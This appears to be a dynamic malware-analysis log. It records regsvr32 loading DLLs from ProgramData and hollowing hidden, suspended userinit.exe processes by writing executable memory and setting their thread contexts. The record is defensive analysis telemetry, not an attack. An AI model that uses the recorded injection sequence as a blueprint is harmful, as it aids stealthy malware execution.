Create	C:\Windows\System32\userinit.exe	os_pid = 0xf74, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0xf9c, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0xfc8, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0x854, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0x8a4, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0x180, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0x174, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0x844, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0x5cc, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0x2a8, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0x8e8, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0x998, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0x94c, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0xa54, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0xa80, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0xae8, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0xaf0, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Create	C:\Windows\System32\userinit.exe	os_pid = 0xbb4, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE	1	Fn
Terminate	C:\Windows\System32\userinit.exe	exit_code = 0	1	Fn

Thread (55)

»

Operation	Process	Additional Information	Count	Logfile
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Get Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Set Context	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn
Resume	c:\windows\system32\regsvr32.exe	os_tid = 0xf1c	1	Fn

Memory (74)

»

Operation	Process	Additional Information	Count	Logfile
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x0, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Allocate	C:\Windows\System32\userinit.exe	address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 405504	1	Fn
Read	C:\Windows\System32\userinit.exe	address = 0x7ffdf008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffd5008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffd8008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffd6008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffda008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffdf008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffdf008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffd6008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffd7008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffd6008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffdc008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffd5008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffd3008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffdf008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffd8008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffde008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffd9008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffde008, size = 4	1	Fn Data
Read	C:\Windows\System32\userinit.exe	address = 0x7ffde008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffdf008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffd5008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffd8008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffd6008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffda008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffdf008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffd6008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffd7008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffd6008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffdc008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffd5008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffd3008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffdf008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffd8008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffde008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffd9008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffde008, size = 4	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x400000, size = 405504	1	Fn Data
Write	C:\Windows\System32\userinit.exe	address = 0x7ffde008, size = 4	1	Fn Data

Module (400)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\ProgramData\tempa\marxvxinhhm64.dll	-	1	Fn
Load	kernel32.dll	base_address = 0x75370000	7	Fn
Load	c:\programdata\tempa\marxvxinhhm98.dll	base_address = 0x830000	1	Fn
Load	user32.dll	base_address = 0x757b0000	2	Fn
Load	advapi32.dll	base_address = 0x76da0000	2	Fn
Load	oleaut32.dll	base_address = 0x758f0000	1	Fn
Load	version.dll	base_address = 0x745c0000	1	Fn
Load	gdi32.dll	base_address = 0x75880000	1	Fn
Get Handle	c:\windows\system32\regsvr32.exe	base_address = 0xa40000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	3	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	3	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll	base_address = 0x73e90000	1	Fn
Get Filename	-	process_name = c:\windows\system32\regsvr32.exe, file_name_orig = C:\ProgramData\tempa\marxvxinhhm64.dll, size = 522	1	Fn
Get Filename	-	process_name = c:\windows\system32\regsvr32.exe, file_name_orig = C:\Windows\System32\regsvr32.exe, size = 261	5	Fn
Get Filename	c:\programdata\tempa\marxvxinhhm98.dll	process_name = c:\windows\system32\regsvr32.exe, file_name_orig = c:\programdata\tempa\marxvxinhhm98.dll, size = 522	1	Fn
Get Filename	-	process_name = c:\windows\system32\regsvr32.exe, file_name_orig = â, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\regsvr32.exe, file_name_orig = C:\Windows\System32\regsvr32.exe, size = 256	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = VirtualAlloc, address_out = 0x753c2fb6	4	Fn
Get Address	c:\windows\system32\kernel32.dll	function = VirtualFree, address_out = 0x753c1da4	4	Fn
Get Address	c:\windows\system32\kernel32.dll	function = VirtualProtect, address_out = 0x753b2341	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetThreadPreferredUILanguages, address_out = 0x753b22d7	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadPreferredUILanguages, address_out = 0x753ae627	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetThreadUILanguage, address_out = 0x753aae42	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetNativeSystemInfo, address_out = 0x753abe77	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExW, address_out = 0x753ade40	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLogicalProcessorInformation, address_out = 0x753a2004	4	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	3	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	3	Fn
Get Address	c:\programdata\tempa\marxvxinhhm98.dll	function = BTMEMO, address_out = 0x917bf0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = DeleteCriticalSection, address_out = 0x76f79ac5	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LeaveCriticalSection, address_out = 0x76f67760	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = EnterCriticalSection, address_out = 0x76f677a0	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = InitializeCriticalSection, address_out = 0x76f7a149	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalAlloc, address_out = 0x753c3363	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersion, address_out = 0x753b154e	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThreadId, address_out = 0x753bbb80	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = InterlockedDecrement, address_out = 0x753bbbf0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = InterlockedIncrement, address_out = 0x753bbbc0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = VirtualQuery, address_out = 0x753c76d6	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = WideCharToMultiByte, address_out = 0x753c450e	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = MultiByteToWideChar, address_out = 0x753c452b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = lstrlenA, address_out = 0x753ba611	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = lstrcpynA, address_out = 0x753a8979	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LoadLibraryExA, address_out = 0x753b47fa	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetThreadLocale, address_out = 0x753b153c	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetStartupInfoA, address_out = 0x75371e10	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetProcAddress, address_out = 0x753c33d3	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetModuleHandleA, address_out = 0x753bcf41	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetModuleFileNameA, address_out = 0x753c33f6	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLocaleInfoA, address_out = 0x753aadbf	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCommandLineA, address_out = 0x753c98ff	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FreeLibrary, address_out = 0x753bd9d0	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FindFirstFileA, address_out = 0x753c2d89	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FindClose, address_out = 0x753c0e62	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = ExitProcess, address_out = 0x753c214f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = WriteFile, address_out = 0x753c1400	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x753ced38	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = RtlUnwind, address_out = 0x753a7f70	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = RaiseException, address_out = 0x753aeb60	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetStdHandle, address_out = 0x753c1e46	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetKeyboardType, address_out = 0x757fbfee	1	Fn
Get Address	c:\windows\system32\user32.dll	function = LoadStringA, address_out = 0x757b66a7	2	Fn
Get Address	c:\windows\system32\user32.dll	function = MessageBoxA, address_out = 0x7580ea11	2	Fn
Get Address	c:\windows\system32\user32.dll	function = CharNextA, address_out = 0x757bc861	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = RegQueryValueExA, address_out = 0x76db48ef	2	Fn
Get Address	c:\windows\system32\advapi32.dll	function = RegOpenKeyExA, address_out = 0x76db4907	2	Fn
Get Address	c:\windows\system32\advapi32.dll	function = RegCloseKey, address_out = 0x76db469d	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = SysFreeString, address_out = 0x758f3e59	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = SysReAllocStringLen, address_out = 0x758f7810	1	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = SysAllocStringLen, address_out = 0x758f45d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = TlsSetValue, address_out = 0x753bda88	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = TlsGetValue, address_out = 0x753bda70	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = TlsFree, address_out = 0x753c13b8	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = TlsAlloc, address_out = 0x753c35a1	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = lstrcpyA, address_out = 0x753b9793	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = WriteProcessMemory, address_out = 0x753ac1de	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = WaitForSingleObject, address_out = 0x753bba90	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = VirtualAllocEx, address_out = 0x753ac1b6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = TerminateProcess, address_out = 0x753b2331	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = Sleep, address_out = 0x753bba46	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SizeofResource, address_out = 0x753b3e7f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadLocale, address_out = 0x753d88e6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadContext, address_out = 0x75400193	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetFilePointer, address_out = 0x753bdb36	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetEvent, address_out = 0x753bbccc	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetErrorMode, address_out = 0x753c4a51	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetEndOfFile, address_out = 0x753b2319	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = ResumeThread, address_out = 0x753b0f1c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = ResetEvent, address_out = 0x753bbcb4	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = ReadProcessMemory, address_out = 0x753ac1ce	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = ReadFile, address_out = 0x753b96fb	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = MulDiv, address_out = 0x753bb7a0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LockResource, address_out = 0x753afd29	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LoadResource, address_out = 0x753b984d	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LoadLibraryA, address_out = 0x753c395c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalUnlock, address_out = 0x753b9d50	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalReAlloc, address_out = 0x753aec90	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalHandle, address_out = 0x753ba0c4	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalLock, address_out = 0x753b9e05	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFindAtomA, address_out = 0x753d6a4b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalDeleteAtom, address_out = 0x753af16c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAddAtomA, address_out = 0x753a83ea	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetTickCount, address_out = 0x753bba60	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetThreadContext, address_out = 0x753d0cc1	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetSystemInfo, address_out = 0x753c3728	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetStringTypeExA, address_out = 0x753a689f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLocalTime, address_out = 0x753ba90e	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetFullPathNameA, address_out = 0x753c3735	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceA, address_out = 0x753cd7d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDateFormatA, address_out = 0x753d5625	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcessId, address_out = 0x753bcac4	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCPInfo, address_out = 0x753c1e2e	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetACP, address_out = 0x753c39aa	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FreeResource, address_out = 0x753af1bd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = InterlockedExchange, address_out = 0x753bbf0a	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FormatMessageA, address_out = 0x753d8868	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FindResourceA, address_out = 0x753ba05b	1	Fn
